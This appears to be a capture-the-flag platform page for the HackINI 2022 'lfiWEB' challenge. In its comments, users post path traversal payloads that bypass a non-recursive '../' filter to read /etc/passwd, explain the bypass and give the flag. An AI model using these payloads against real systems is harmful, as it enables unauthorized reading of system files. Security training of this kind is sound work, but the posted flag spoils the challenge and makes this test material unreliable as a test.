lfiWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2022
题目作者: 未知
一  血: tzzzez
一血奖励: 0金币
解  决: 1857
提  示:
描  述:
We made some serious checks now, would you test it ?
评论
意大利炮 1年前

/?language=/....//....//....//....//etc/passwd

回复 0

小白帽来挖个漏洞 1年前

解析:https://blog.csdn.net/guanrongl/article/details/142967307

回复 0

阿甘先生 1年前

?language=..//etc/passwd

回复 0

jun1223 1年前

?language=/etc/passwd 这也行

回复 3

userxin 1年前

?language=/../../../../../etc/passwd

回复 0

hbesljx 1年前

直接language=....//....//....//....//....//....//etc/passwd即可。..../过滤掉../后还是../

回复 1

1005667204 1年前

使用?language=./language/..././..././..././..././..././..././..././etc/passwd或者使用双写?language=/languages/....//....//....//....//....//....//etc/passwd

回复 0

18993258097 1年前

shellmates{SH0uLD_H4Ve_MadE_th3_checK_recuRS1V3}

回复 0

菜鸡的小韩 1年前

这是一个基本的绕过,因为 str_replace('../', '',$_GET['language'])这串代码../会被替换成空格,所以要进行一个绕过,用..././来代替../ 。url中写?language=./..././..././..././..././..././etc/passwd即可

回复 0

ABC第一深情 1年前

/?language=/etc/passwd

回复 3

WriteUp

image
a2cai

2 金币

评分(1)

解题动态

zerogoctf 攻破了该题 1天前
出题人我会一直让你等着 攻破了该题 1天前
帅Yu 攻破了该题 2天前
guoadmin 攻破了该题 3天前
erobot 攻破了该题 3天前
oohyodec 攻破了该题 4天前
tytytg 攻破了该题 4天前
noooo 攻破了该题 5天前
wywitkey 攻破了该题 7天前
意料之中是戏 攻破了该题 7天前
Tim.Drake 攻破了该题 9天前
jhgtx 攻破了该题 10天前
david666 攻破了该题 10天前
linxi789654 攻破了该题 10天前
1211020612 攻破了该题 12天前
xiangsi 攻破了该题 12天前
chrisslyy 攻破了该题 12天前
zhatao 攻破了该题 13天前
13675095331 攻破了该题 14天前
蛋总 攻破了该题 15天前
问题反馈